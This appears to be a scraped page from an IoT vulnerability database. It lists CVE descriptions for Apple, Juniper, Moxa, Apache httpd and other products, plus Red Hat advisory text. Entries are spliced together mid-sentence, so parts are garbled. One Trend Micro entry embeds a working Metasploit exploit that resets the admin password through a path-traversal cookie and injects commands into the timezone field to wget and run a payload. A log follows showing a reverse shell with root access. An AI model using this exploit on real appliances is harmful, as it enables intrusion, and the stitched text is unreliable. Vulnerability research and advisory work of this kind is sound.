VARIoT IoT vulnerabilities database

Buffer overflow in ImageIO in Apple Mac OS X 10.6 through 10.6.3 and Mac OS X Server 10.6 through 10.6.3 allows remote attackers to execute arbitrary code or cause a denial of service (crash) via a crafted image. Both Apple Mac OS X and Apple Mac OS X Server are products of Apple (Apple). Apple Mac OS X is a dedicated operating system developed for Mac computers. ImageIO is one of the static methods used to perform common image I/O operations

Apple Mac OS X 10.6 through 10.6.3 and Mac OS X Server 10.6 through 10.6.3 allows local users to obtain system privileges. Kernel is one of the kernel components. A local attacker could exploit this vulnerability to gain system privileges

A memory exhaustion vulnerability exists in Asterisk Open Source 13.x before 13.15.1 and 14.x before 14.4.1 and Certified Asterisk 13.13 before 13.13-cert4, which can be triggered by sending specially crafted SCCP packets causing an infinite loop and leading to memory exhaustion (by message logging in that loop). Asterisk Open Source and Certified Asterisk Contains a resource exhaustion vulnerability.Service operation interruption (DoS) There is a possibility of being put into a state. Multiple Asterisk products are prone to a remote denial-of-service vulnerability. An attacker can exploit this issue to cause a denial-of-service condition

Multiple cross-site scripting (XSS) vulnerabilities in TeamPass 2.1.24 and earlier allow remote attackers to inject arbitrary web script or HTML via the (1) label value of an item or (2) name of a role. TeamPass is a password manager dedicated to Apache, MySQL and PHP. A cross-site scripting vulnerability exists in TeamPass 2.1.24 and earlier

An insufficient authentication vulnerability in Juniper Networks NorthStar Controller Application prior to version 2.1.0 Service Pack 1 may allow an unprivileged, authenticated, user to execute certain specific unprivileged system files capable of causing widespread denials of system services. JuniperNetworksNorthStarControllerApplication is a traffic planning controller from Juniper Networks. The controller optimizes the service provider's transport network by establishing an open industry standard protocol. A security vulnerability exists in versions prior to JuniperNetworksNorthStarControllerApplication2.1.0ServicePack1. An attacker could exploit the vulnerability to cause a denial of service. Versions prior to Juniper NorthStar Controller Application 2.1.0 Service Pack 1 are vulnerable

An information disclosure vulnerability in Juniper Networks NorthStar Controller Application prior to version 2.1.0 Service Pack 1 may allow an unprivileged, authenticated, network-based attacker to replicate the underlying Junos OS VM and all data it maintains to their local system for future analysis. Juniper NorthStar Controller Application is prone to a local local security-bypass vulnerability. An attacker may exploit this issue to bypass certain security restrictions and perform unauthorized actions. Juniper NorthStar Controller Application before version 2.1.0 Service Pack 1 are vulnerable. The controller optimizes a service provider's transport network by establishing open industry-standard protocols. An attacker could exploit this vulnerability to copy data on the underlying Junos OS VM and the local system

A vulnerability in Juniper Networks NorthStar Controller Application prior to version 2.1.0 Service Pack 1 may allow an unauthenticated, unprivileged, network-based attacker to cause various denials of services leading to targeted information disclosure, modification of any component of the NorthStar system, including managed systems, and full denial of services to any systems under management which NorthStar interacts with using read-only or read-write credentials. Juniper Networks NorthStar Controller Applications have vulnerabilities related to authorization, permissions, and access control.Information is obtained, tampered with, and disrupted by network-based attackers (DoS) An attack may be carried out. JuniperNetworksNorthStarControllerApplication is a traffic planning controller from Juniper Networks. The controller optimizes the service provider's transport network by establishing an open industry standard protocol. Permissions and access control vulnerabilities existed in versions prior to JuniperNetworksNorthStarControllerApplication2.1.0ServicePack1. An attacker could exploit the vulnerability to cause a denial of service and change components on the NorthStar system. Versions prior to Juniper NorthStar Controller Application 2.1.0 Service Pack 1 are vulnerable

A denial of service vulnerability in Juniper Networks NorthStar Controller Application prior to version 2.1.0 Service Pack 1, may allow an authenticated user to cause widespread denials of service to system services by consuming TCP and UDP ports which are normally reserved for other system services. Juniper NorthStar Controller Application is prone to a local denial-of-service vulnerability. An attacker can exploit this issue to cause a denial-of-service condition. The controller optimizes a service provider's transport network by establishing open industry-standard protocols

A denial of service vulnerability in Juniper Networks NorthStar Controller Application prior to version 2.1.0 Service Pack 1 may allow an authenticated malicious user to consume large amounts of system resources leading to a cascading denial of services. Juniper NorthStar Controller Application is prone to a local denial-of-service vulnerability. An attacker can exploit this issue to crash the affected application, resulting in denial-of-service condition. The controller optimizes a service provider's transport network by establishing open industry-standard protocols

A command execution flaw on the Trend Micro Threat Discovery Appliance 2.6.1062r1 exists with the timezone parameter in the admin_sys_time.cgi interface. TrendMicroThreatDiscoveryAppliance is the next generation network monitoring device. The TrendMicroThreatDiscoveryApplianceadmin_sys_time.cgi interface handles security holes in the timezone parameter. A remote attacker can exploit a vulnerability to submit a special request to execute arbitrary commands. The first is an authentication bypass vulnerability via a file delete in logoff.cgi which resets the admin password back to 'admin' upon a reboot (CVE-2016-7552). Note: You have the option to use the authentication bypass or not since it requires that the server is rebooted. The password reset will render the authentication useless. Typically, if an administrator cant login, they will bounce the box. Therefore, this module performs a heart beat request until the box is bounced and then attempts to login and to perform the command injection. This module has been tested on version 2.6.1062r1 of the appliance. }, 'Author' => [ 'mr_me <steventhomasseeley@gmail.com>', # vuln + msf 'Roberto Suggi Liverani @malerisch', # vuln + msf ], 'License' => MSF_LICENSE, 'References' => [ [ 'URL', 'https://asciinema.org/a/112480'], # demo [ 'CVE', '2016-7552'], # auth bypass [ 'CVE', '2016-7547'], # cmdi ], 'Platform' => 'linux', 'Arch' => ARCH_X86, 'Privileged' => true, 'Payload' => { 'DisableNops' => true, }, 'Targets' => [ [ 'Trend Micro Threat Discovery Appliance 2.6.1062r1', {} ] ], 'DefaultOptions' => { 'SSL' => true }, 'DefaultTarget' => 0, 'DisclosureDate' => 'Apr 10 2017')) register_options( [ Opt::RPORT(443), OptString.new('TARGETURI', [true, 'The target URI', '/']), OptString.new('PASSWORD', [true, 'The password to authenticate with', 'admin']), OptPort.new('SRVPORT', [ true, 'The daemon port to listen on', 1337 ]), OptBool.new('AUTHBYPASS', [ true, 'Bypass the authentication', true ]), ], self.class) end def check if do_login res = send_request_cgi({ 'uri' => normalize_uri(target_uri.path, 'cgi-bin/about.cgi'), 'cookie' => @cookie, 'method' => 'GET', }, 1) if res and res.code == 200 and res.body =~ /About Trend Micro/ version = "#{$1}" if res.body =~ /var ver_str = new String\("(.*)"\)/ case version when /2.6.1062/ return Exploit::CheckCode::Vulnerable end end end return Exploit::CheckCode::Safe end def exploit if datastore['AUTHBYPASS'] print_status("Bypassing authentication...") if reset_password print_good("The password has been reset!") print_status("Waiting for the administrator to reboot...") pwn_after_reboot end else if do_login pwn else fail_with(Failure::NoAccess, "Authentication failed") end end end def reset_password c = "session_id=../../../opt/TrendMicro/MinorityReport/etc/igsa.conf" res = send_request_cgi({ 'uri' => normalize_uri(target_uri.path, 'cgi-bin/logoff.cgi'), 'method' => 'GET', 'cookie' => c, }) if res and res.code == 200 and res.headers.to_s =~ /Backtrace/ return true end return false end def pwn start_http_server print_good("Logged in") download_exec end def pwn_after_reboot @rebooted = false while !@rebooted if do_login @rebooted = true pwn end end end def on_request_uri(cli, request) if (not @pl) print_error("#{rhost}:#{rport} - A request came in, but the payload wasn't ready yet!") return end print_status("#{rhost}:#{rport} - Sending the payload to the server...") @elf_sent = true send_response(cli, @pl) end def start_http_server @pl = generate_payload_exe @elf_sent = false downfile = rand_text_alpha(8+rand(8)) resource_uri = '/' + downfile # do not use SSL for the attacking web server if datastore['SSL'] ssl_restore = true datastore['SSL'] = false end if (datastore['SRVHOST'] == "0.0.0.0" or datastore['SRVHOST'] == "::") srv_host = datastore['URIHOST'] || Rex::Socket.source_address(rhost) else srv_host = datastore['SRVHOST'] end @service_url = 'http://' + srv_host + ':' + datastore['SRVPORT'].to_s + resource_uri service_url_payload = srv_host + resource_uri print_status("#{rhost}:#{rport} - Starting up our web service on #{@service_url} ...") start_service({'Uri' => { 'Proc' => Proc.new { |cli, req| on_request_uri(cli, req) }, 'Path' => resource_uri }}) datastore['SSL'] = true if ssl_restore connect end def exec(cmd) send_request_cgi({ 'uri' => normalize_uri(target_uri.path, 'cgi-bin/admin_sys_time.cgi'), 'cookie' => @cookie, 'method' => 'POST', 'vars_post' => { 'act' => 'save', 'timezone' => cmd, } }, 1) end def download_exec @bd = rand_text_alpha(8+rand(8)) register_file_for_cleanup("/tmp/#{@bd}") exec("|`wget #{@service_url} -O /tmp/#{@bd}`") exec("|`chmod 755 /tmp/#{@bd}`") exec("|`/tmp/#{@bd}`") # we need to delay, for the stager select(nil, nil, nil, 5) end def do_login begin login = send_request_cgi({ 'uri' => normalize_uri(target_uri.path, 'cgi-bin/logon.cgi'), 'method' => 'POST', 'vars_post' => { 'passwd' => datastore['PASSWORD'], 'isCookieEnable' => 1, } }) # these are needed due to the reboot rescue Rex::ConnectionRefused return false rescue Rex::ConnectionTimeout return false end if login and login.code == 200 and login.body =~ /frame\.cgi/ @cookie = "session_id=#{$1};" if login.get_cookies =~ /session_id=(.*);/ return true end return false end end =begin saturn:metasploit-framework mr_me$ ./msfconsole -qr scripts/trend.rc [*] Processing scripts/trend.rc for ERB directives. resource (scripts/trend.rc)> use exploit/multi/http/trendmicro_threat_discovery_admin_sys_time_cmdi resource (scripts/trend.rc)> set RHOST 192.168.100.2 RHOST => 192.168.100.2 resource (scripts/trend.rc)> set payload linux/x86/meterpreter/reverse_tcp payload => linux/x86/meterpreter/reverse_tcp resource (scripts/trend.rc)> set LHOST 192.168.100.13 LHOST => 192.168.100.13 resource (scripts/trend.rc)> exploit [*] Exploit running as background job. [*] Started reverse TCP handler on 192.168.100.13:4444 [*] Bypassing authentication... msf exploit(trendmicro_threat_discovery_admin_sys_time_cmdi) > [+] The password has been reset! [*] Waiting for the reboot... [*] 192.168.100.2:443 - Starting up our web service on http://192.168.100.13:1337/nnDBuOUMuKnxP ... [*] Using URL: http://0.0.0.0:1337/nnDBuOUMuKnxP [*] Local IP: http://192.168.100.13:1337/nnDBuOUMuKnxP [+] Logged in [*] 192.168.100.2:443 - Sending the payload to the server... [*] Transmitting intermediate stager for over-sized stage...(105 bytes) [*] Sending stage (1495599 bytes) to 192.168.100.2 [*] Meterpreter session 1 opened (192.168.100.13:4444 -> 192.168.100.2:46140) at 2016-09-23 14:59:08 -0500 [+] Deleted /tmp/rpNDXQZTB [*] Server stopped. msf exploit(trendmicro_threat_discovery_admin_sys_time_cmdi) > sessions -i 1 [*] Starting interaction with 1... meterpreter > shell Process 3846 created. Channel 1 created. BusyBox v1.00 (2010.10.13-06:52+0000) Built-in shell (ash) Enter 'help' for a list of built-in commands. /bin/sh: can't access tty; job control turned off /opt/TrendMicro/MinorityReport/www/cgi-bin # id id uid=0(root) gid=0(root) /opt/TrendMicro/MinorityReport/www/cgi-bin # =end

A buffer overflow vulnerability in Juniper Networks NorthStar Controller Application prior to version 2.1.0 Service Pack 1 may allow an authenticated malicious user to cause a buffer overflow leading to a denial of service. JuniperNetworksNorthStarControllerApplication is a traffic planning controller from Juniper Networks. The controller optimizes the service provider's transport network by establishing an open industry standard protocol. An attacker could exploit the vulnerability to cause a denial of service. Juniper NorthStar Controller Application is prone to a local buffer-overflow vulnerability because it fails to perform adequate boundary checks on user-supplied data. An attacker can exploit this issue to crash the affected application, resulting in denial-of-service condition. Due to the nature of this issue, arbitrary code execution may be possible but this has not been confirmed

A buffer overflow vulnerability in Juniper Networks NorthStar Controller Application prior to version 2.1.0 Service Pack 1 may allow an authenticated malicious user to cause a buffer overflow leading to a denial of service. JuniperNetworksNorthStarControllerApplication is a traffic planning controller from Juniper Networks. The controller optimizes the service provider's transport network by establishing an open industry standard protocol. An attacker could exploit the vulnerability to cause a denial of service. Successful exploits may allow an attacker to execute arbitrary code or cause denial-of-service conditions

A command injection vulnerability in Juniper Networks NorthStar Controller Application prior to version 2.1.0 Service Pack 1 may allow a network-based malicious attacker to cause a denial of service condition. JuniperNetworksNorthStarControllerApplication is a traffic planning controller from Juniper Networks. The controller optimizes the service provider's transport network by establishing an open industry standard protocol. A command injection vulnerability exists in versions prior to JuniperNetworksNorthStarControllerApplication2.1.0ServicePack1

A denial of service vulnerability in Juniper Networks NorthStar Controller Application prior to version 2.1.0 Service Pack 1 may allow a malicious attacker crafting packets destined to the device to cause a persistent denial of service to the path computation server service. (DoS) There is a possibility of being put into a state. JuniperNetworksNorthStarControllerApplication is a traffic planning controller from Juniper Networks. The controller optimizes the service provider's transport network by establishing an open industry standard protocol

An escalation of privilege vulnerability in Fortinet FortiWLC-SD versions 8.2.4 and below allows attacker to gain root access via the CLI command 'copy running-config'. FortinetFortiWLC-SD is an unlimited router product from Fortinet. There is a privilege elevation vulnerability in FortinetFortiWLC-SD. Fortinet FortiWLC-SD is prone to a privilege-escalation vulnerability. Fortinet FortiWLC-SD 8.2.4 and prior versions are vulnerable. Fortinet FortiWLC-SD is a wireless LAN controller from Fortinet

A vulnerability in Juniper Networks NorthStar Controller Application prior to version 2.1.0 Service Pack 1 may allow an unauthenticated, unprivileged, network-based attacker to cause various system services partial to full denials of services, modification of system states and files, and potential disclosure of sensitive information which may assist the attacker in further attacks on the system through the use of multiple attack vectors, including man-in-the-middle attacks, file injections, and malicious execution of commands causing out of bound memory conditions leading to other attacks. Juniper Networks NorthStar Controller Applications have vulnerabilities related to authorization, permissions, and access control.Information is obtained, tampered with, and disrupted by network-based attackers (DoS) An attack may be carried out. JuniperNetworksNorthStarControllerApplication is a traffic planning controller from Juniper Networks. The controller optimizes the service provider's transport network by establishing an open industry standard protocol. A remote privilege elevation vulnerability exists in versions prior to JuniperNetworksNorthStarControllerApplication2.1.0ServicePack1. An attacker could exploit the vulnerability to gain elevated privileges. Versions prior to Juniper NorthStar Controller Application 2.1.0 Service Pack 1 are vulnerable

An exploitable Cleartext Transmission of Password vulnerability exists in the Web Application functionality of Moxa AWK-3131A Wireless Access Point running firmware 1.1. The Change Password functionality of the Web Application transmits the password in cleartext. An attacker capable of intercepting this traffic is able to obtain valid credentials. Moxa AWK-3131A Wireless AP Contains a vulnerability related to the password management function.Information is obtained, information is altered, and service operation is disrupted (DoS) An attack may be carried out. MoxaAWK-3131AWirelessAccessPoint is a wireless switch from China's Moxa. WebApplication is one of the web application modules. A security vulnerability exists in the WebApplication feature in MoxaAWK-3131AWirelessAccessPoint using version 1.1 firmware, which is caused by the program transmitting passwords in clear text

An exploitable Cross-Site Request Forgery vulnerability exists in the Web Application functionality of Moxa AWK-3131A Wireless Access Point running firmware 1.1. A specially crafted form can trick a client into making an unintentional request to the web server which will be treated as an authentic request. MoxaAWK-3131AWirelessAccessPoint is a wireless switch from China's Moxa. A remote attacker could exploit this vulnerability to perform unauthorized operations

An exploitable reflected Cross-Site Scripting vulnerability exists in the Web Application functionality of Moxa AWK-3131A Wireless Access Point running firmware 1.1. Specially crafted input, in multiple parameters, can cause a malicious scripts to be executed by a victim. Moxa AWK-3131A Wireless AP Contains a cross-site scripting vulnerability.Information may be obtained and information may be altered. MoxaAWK-3131AWirelessAccessPoint is a wireless switch from China's Moxa. WebApplication is one of the web application modules

In Apache httpd 2.2.x before 2.2.33 and 2.4.x before 2.4.26, mod_mime can read one byte past the end of a buffer when sending a malicious Content-Type response header. Apache httpd Contains a buffer error vulnerability.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. Apache HTTP Server is prone to a buffer-overflow vulnerability. An attacker can exploit this issue to cause denial-of-service conditions. Due to the nature of this issue, arbitrary code execution may be possible but this has not been confirmed. The following versions are vulnerable: Apache HTTP Server 2.2.0 to 2.2.32 Apache HTTP Server 2.4.0 to 2.4.25. 7) - x86_64 3. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 ===================================================================== Red Hat Security Advisory Synopsis: Important: httpd24-httpd security update Advisory ID: RHSA-2017:2483-01 Product: Red Hat Software Collections Advisory URL: https://access.redhat.com/errata/RHSA-2017:2483 Issue date: 2017-08-16 CVE Names: CVE-2017-3167 CVE-2017-3169 CVE-2017-7659 CVE-2017-7668 CVE-2017-7679 CVE-2017-9788 ===================================================================== 1. Summary: An update for httpd24-httpd is now available for Red Hat Software Collections. Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section. 2. Relevant releases/architectures: Red Hat Software Collections for Red Hat Enterprise Linux Server (v. 6) - noarch, x86_64 Red Hat Software Collections for Red Hat Enterprise Linux Server (v. 7) - noarch, x86_64 Red Hat Software Collections for Red Hat Enterprise Linux Server EUS (v. 6.7) - noarch, x86_64 Red Hat Software Collections for Red Hat Enterprise Linux Server EUS (v. 7.3) - noarch, x86_64 Red Hat Software Collections for Red Hat Enterprise Linux Workstation (v. 6) - noarch, x86_64 Red Hat Software Collections for Red Hat Enterprise Linux Workstation (v. 7) - noarch, x86_64 3. Security Fix(es): * It was discovered that the httpd's mod_auth_digest module did not properly initialize memory before using it when processing certain headers related to digest authentication. A remote attacker could possibly use this flaw to disclose potentially sensitive information or cause httpd child process to crash by sending specially crafted requests to a server. (CVE-2017-9788) * It was discovered that the use of httpd's ap_get_basic_auth_pw() API function outside of the authentication phase could lead to authentication bypass. A remote attacker could possibly use this flaw to bypass required authentication if the API was used incorrectly by one of the modules used by httpd. (CVE-2017-3167) * A NULL pointer dereference flaw was found in the httpd's mod_ssl module. A remote attacker could use this flaw to cause an httpd child process to crash if another module used by httpd called a certain API function during the processing of an HTTPS request. (CVE-2017-3169) * A NULL pointer dereference flaw was found in the mod_http2 module of httpd. A remote attacker could use this flaw to cause httpd child process to crash via a specially crafted HTTP/2 request. (CVE-2017-7659) * A buffer over-read flaw was found in the httpd's ap_find_token() function. A remote attacker could use this flaw to cause httpd child process to crash via a specially crafted HTTP request. (CVE-2017-7668) * A buffer over-read flaw was found in the httpd's mod_mime module. A user permitted to modify httpd's MIME configuration could use this flaw to cause httpd child process to crash. (CVE-2017-7679) 4. Solution: For details on how to apply this update, which includes the changes described in this advisory, refer to: https://access.redhat.com/articles/11258 After installing the updated packages, the httpd daemon will be restarted automatically. 5. Bugs fixed (https://bugzilla.redhat.com/): 1463194 - CVE-2017-3167 httpd: ap_get_basic_auth_pw() authentication bypass 1463197 - CVE-2017-3169 httpd: mod_ssl NULL pointer dereference 1463199 - CVE-2017-7659 httpd: mod_http2 NULL pointer dereference 1463205 - CVE-2017-7668 httpd: ap_find_token() buffer overread 1463207 - CVE-2017-7679 httpd: mod_mime buffer overread 1470748 - CVE-2017-9788 httpd: Uninitialized memory reflection in mod_auth_digest 6. Package List: Red Hat Software Collections for Red Hat Enterprise Linux Server (v. 6): Source: httpd24-httpd-2.4.25-9.el6.1.src.rpm noarch: httpd24-httpd-manual-2.4.25-9.el6.1.noarch.rpm x86_64: httpd24-httpd-2.4.25-9.el6.1.x86_64.rpm httpd24-httpd-debuginfo-2.4.25-9.el6.1.x86_64.rpm httpd24-httpd-devel-2.4.25-9.el6.1.x86_64.rpm httpd24-httpd-tools-2.4.25-9.el6.1.x86_64.rpm httpd24-mod_ldap-2.4.25-9.el6.1.x86_64.rpm httpd24-mod_proxy_html-2.4.25-9.el6.1.x86_64.rpm httpd24-mod_session-2.4.25-9.el6.1.x86_64.rpm httpd24-mod_ssl-2.4.25-9.el6.1.x86_64.rpm Red Hat Software Collections for Red Hat Enterprise Linux Server EUS (v. 6.7): Source: httpd24-httpd-2.4.25-9.el6.1.src.rpm noarch: httpd24-httpd-manual-2.4.25-9.el6.1.noarch.rpm x86_64: httpd24-httpd-2.4.25-9.el6.1.x86_64.rpm httpd24-httpd-debuginfo-2.4.25-9.el6.1.x86_64.rpm httpd24-httpd-devel-2.4.25-9.el6.1.x86_64.rpm httpd24-httpd-tools-2.4.25-9.el6.1.x86_64.rpm httpd24-mod_ldap-2.4.25-9.el6.1.x86_64.rpm httpd24-mod_proxy_html-2.4.25-9.el6.1.x86_64.rpm httpd24-mod_session-2.4.25-9.el6.1.x86_64.rpm httpd24-mod_ssl-2.4.25-9.el6.1.x86_64.rpm Red Hat Software Collections for Red Hat Enterprise Linux Workstation (v. 6): Source: httpd24-httpd-2.4.25-9.el6.1.src.rpm noarch: httpd24-httpd-manual-2.4.25-9.el6.1.noarch.rpm x86_64: httpd24-httpd-2.4.25-9.el6.1.x86_64.rpm httpd24-httpd-debuginfo-2.4.25-9.el6.1.x86_64.rpm httpd24-httpd-devel-2.4.25-9.el6.1.x86_64.rpm httpd24-httpd-tools-2.4.25-9.el6.1.x86_64.rpm httpd24-mod_ldap-2.4.25-9.el6.1.x86_64.rpm httpd24-mod_proxy_html-2.4.25-9.el6.1.x86_64.rpm httpd24-mod_session-2.4.25-9.el6.1.x86_64.rpm httpd24-mod_ssl-2.4.25-9.el6.1.x86_64.rpm Red Hat Software Collections for Red Hat Enterprise Linux Server (v. 7): Source: httpd24-httpd-2.4.25-9.el7.1.src.rpm noarch: httpd24-httpd-manual-2.4.25-9.el7.1.noarch.rpm x86_64: httpd24-httpd-2.4.25-9.el7.1.x86_64.rpm httpd24-httpd-debuginfo-2.4.25-9.el7.1.x86_64.rpm httpd24-httpd-devel-2.4.25-9.el7.1.x86_64.rpm httpd24-httpd-tools-2.4.25-9.el7.1.x86_64.rpm httpd24-mod_ldap-2.4.25-9.el7.1.x86_64.rpm httpd24-mod_proxy_html-2.4.25-9.el7.1.x86_64.rpm httpd24-mod_session-2.4.25-9.el7.1.x86_64.rpm httpd24-mod_ssl-2.4.25-9.el7.1.x86_64.rpm Red Hat Software Collections for Red Hat Enterprise Linux Server EUS (v. 7.3): Source: httpd24-httpd-2.4.25-9.el7.1.src.rpm noarch: httpd24-httpd-manual-2.4.25-9.el7.1.noarch.rpm x86_64: httpd24-httpd-2.4.25-9.el7.1.x86_64.rpm httpd24-httpd-debuginfo-2.4.25-9.el7.1.x86_64.rpm httpd24-httpd-devel-2.4.25-9.el7.1.x86_64.rpm httpd24-httpd-tools-2.4.25-9.el7.1.x86_64.rpm httpd24-mod_ldap-2.4.25-9.el7.1.x86_64.rpm httpd24-mod_proxy_html-2.4.25-9.el7.1.x86_64.rpm httpd24-mod_session-2.4.25-9.el7.1.x86_64.rpm httpd24-mod_ssl-2.4.25-9.el7.1.x86_64.rpm Red Hat Software Collections for Red Hat Enterprise Linux Workstation (v. 7): Source: httpd24-httpd-2.4.25-9.el7.1.src.rpm noarch: httpd24-httpd-manual-2.4.25-9.el7.1.noarch.rpm x86_64: httpd24-httpd-2.4.25-9.el7.1.x86_64.rpm httpd24-httpd-debuginfo-2.4.25-9.el7.1.x86_64.rpm httpd24-httpd-devel-2.4.25-9.el7.1.x86_64.rpm httpd24-httpd-tools-2.4.25-9.el7.1.x86_64.rpm httpd24-mod_ldap-2.4.25-9.el7.1.x86_64.rpm httpd24-mod_proxy_html-2.4.25-9.el7.1.x86_64.rpm httpd24-mod_session-2.4.25-9.el7.1.x86_64.rpm httpd24-mod_ssl-2.4.25-9.el7.1.x86_64.rpm These packages are GPG signed by Red Hat for security. Our key and details on how to verify the signature are available from https://access.redhat.com/security/team/key/ 7. References: https://access.redhat.com/security/cve/CVE-2017-3167 https://access.redhat.com/security/cve/CVE-2017-3169 https://access.redhat.com/security/cve/CVE-2017-7659 https://access.redhat.com/security/cve/CVE-2017-7668 https://access.redhat.com/security/cve/CVE-2017-7679 https://access.redhat.com/security/cve/CVE-2017-9788 https://access.redhat.com/security/updates/classification/#important 8. Contact: The Red Hat security contact is <secalert@redhat.com>. More contact details at https://access.redhat.com/security/team/contact/ Copyright 2017 Red Hat, Inc. -----BEGIN PGP SIGNATURE----- Version: GnuPG v1 iD8DBQFZlNCpXlSAg2UNWIIRArzwAJwNfAuroR6X18rUh+zmjiMy5iBkdwCeJF6e 4v4GwWYC+5xG0xxXzTEQyAg= =UV+2 -----END PGP SIGNATURE----- -- RHSA-announce mailing list RHSA-announce@redhat.com https://www.redhat.com/mailman/listinfo/rhsa-announce . (CVE-2017-7679) * A use-after-free flaw was found in the way httpd handled invalid and previously unregistered HTTP methods specified in the Limit directive used in an .htaccess file. (CVE-2017-9798) Red Hat would like to thank Hanno BAPck for reporting CVE-2017-9798. 6) - i386, noarch, x86_64 3. This software, such as Apache HTTP Server, is common to multiple JBoss middleware products, and is packaged under Red Hat JBoss Core Services to allow for faster distribution of updates, and for a more consistent update experience. This release of Red Hat JBoss Core Services Apache HTTP Server 2.4.23 Service Pack 3 serves as an update to Red Hat JBoss Core Services Apache HTTP Server 2.4.23 Service Pack 2, and includes bug fixes, which are documented in the Release Notes document linked to in the References. Security Fix(es): * An out-of-bounds array dereference was found in apr_time_exp_get(). An attacker could abuse an unvalidated usage of this function to cause a denial of service or potentially lead to data leak. JIRA issues fixed (https://issues.jboss.org/): JBCS-402 - Errata for httpd 2.4.23.SP3 RHEL7 7